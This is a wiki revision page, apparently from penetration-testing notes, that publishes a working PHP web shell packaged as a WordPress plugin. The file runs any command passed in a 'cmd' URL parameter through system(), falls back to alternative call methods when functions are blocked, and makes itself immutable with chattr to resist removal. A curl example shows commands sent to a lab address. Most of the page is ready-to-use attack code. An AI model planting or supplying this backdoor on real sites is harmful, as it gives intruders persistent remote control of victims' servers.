Difference between revisions of "WordPress Plugin - shell.php (variant 1)"
(Created page with "<syntaxhighlight lang=php line> <?php →* * @package My_Shell * @version 1.0: /* Plugin Name: My Shell Plugin URL: http://google.com Description: A quick shell plugin Aut...") |
|||
| Line 1: | Line 1: | ||
| + | The following file can be used as WordPress plugin or geneneric system call interface. Commands should be url-encoded, passed via 'cmd' param. | ||
| + | |||
| + | E.g. | ||
| + | <syntaxhighlight lang=shell line> | ||
| + | curl -G "http://192.168.56.103/wp-content/plugins/shell1/shell.php" --data-urlencode "cmd=ls -altrh" | ||
| + | </syntaxhighlight> | ||
| + | |||
<syntaxhighlight lang=php line> | <syntaxhighlight lang=php line> | ||
<?php | <?php | ||
Revision as of 23:53, 4 May 2018
The following file can be used as WordPress plugin or geneneric system call interface. Commands should be url-encoded, passed via 'cmd' param.
E.g.
curl -G "http://192.168.56.103/wp-content/plugins/shell1/shell.php" --data-urlencode "cmd=ls -altrh"<?php
/**
* @package My_Shell
* @version 1.0
*/
/*
Plugin Name: My Shell
Plugin URL: http://google.com
Description: A quick shell plugin
Author: ZeGnar
Version: 1.0
*/
# prevent file deletion
$myfile = __FILE__;
system("chmod ugo-w $myfile");
system("chattr +i $myfile");
$command=urldecode($_GET["cmd"]);
if (class_exists('ReflectionFunction')) {
$function = new ReflectionFunction('system');
$function->invoke($command);
} elseif (function_exists('call_user_func_array')) {
call_user_func_array('system', array($command));
} elseif (function_exists('call_user_func')) {
call_user_func('system', $command);
} else {
system($command);
}
?>